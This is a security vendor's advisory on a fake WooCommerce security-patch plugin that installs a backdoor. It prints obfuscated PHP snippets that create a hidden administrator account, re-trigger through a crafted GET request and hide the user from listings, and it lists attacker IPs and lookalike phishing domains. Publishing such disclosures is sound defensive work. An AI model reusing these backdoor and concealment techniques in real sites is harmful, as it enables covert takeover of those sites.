Woo Authentication Bypass Update—Fake WooCommerce security patch

If you recently installed this plugin, your website is infected with malware—immediate action is required. It’s not safe to install. If you are unsure your website is affected by this attack, contact your website webmaster or reach out to us.

MAGEFIX SecurityMalware cleanup & protection

Try our free site check.

A malware analyst will provide a security report for your website.

What this plugin does:

$set = base64_decode("V1BfVXNlcg"); // "WP_User"
${$ddf}->set_role(base64_decode('YWRtaQ') . base64_decode('bmlzdHJhdG9y'));

“V1BfVXNlcg” → WP_User
‘YWRtaQ’ → admi
‘bmlzdHJhdG9y’ → nistrator
Grants administrator privileges to a user account (likely hidden), using the WP_User class.

if (isset($_GET['response_type']) && $_GET['response_type'] == 'bearer_code') {
    do_action('unbindFactory341');
}

Triggers the backdoor creation logic remotely via a crafted HTTP request. Another hidden access vector.

$z->query_where .= $wpdb->prepare(" AND {$wpdb->users}.user_login != %s", $A);

This plugin is a stealthy backdoor disguised as a WooCommerce security patch. It:

  • Creates an admin user with a hashed login.
  • Hides that user from visibility.
  • Can be re-triggered via GET requests.
  • Uses cron and hooks to persist.
  • Immediate actions recommended:

  • Delete this plugin immediately.
  • Audit your WordPress users — look for strange usernames.
  • Change all admin passwords.
  • Scan the full site for other malware.
  • Restore from a known clean backup, if possible.
  • Infected folders & files:
    wp-content/uploads/wp-cached-9a621d43/wp-cached-9a621d431.php
    wp-content/plugins/woocommerce-patch/woocommerce-patch.php

    Bad IPs: 35.136.91.170, 69.253.43.105, 76.107.226.166, 173.235.96.131 (used by hackers).

    Malicious URLs:
    https://woōcommerce.com/products/woocommerce-authbypass-update/
    https://bit.ly/3GBRTYz

    Malicious domain: woōcommerce.com (xn--wocommerce-r3b.com), woocommerċe.com (xn--woocommere-7ib.com).
    Malicious Cloudflare: mack.ns.cloudflare.com, tricia.ns.cloudflare.com.

    Accepted URL(s) on xn--wocommerce-r3b.com:
    hxxps://xn--wocommerce-r3b[.]com/products/captcha/jxjlz2xcxdnz?proceed
    Hosting Provider (Cloudflare phishing report):
    UNMANAGED-DEDICATED-SERVERS, GB
    Abuse Contact:
    [email protected]

    Fake patch (plugin code):

    Resources:
    https://developer.woocommerce.com/2025/04/22/dev-advisory-phishing-campaign-targeting-woocommerce-stores/
    https://patchstack.com/articles/fake-security-vulnerability-phishing-campaign-targets-woocommerce-users/

    Magefix Platinum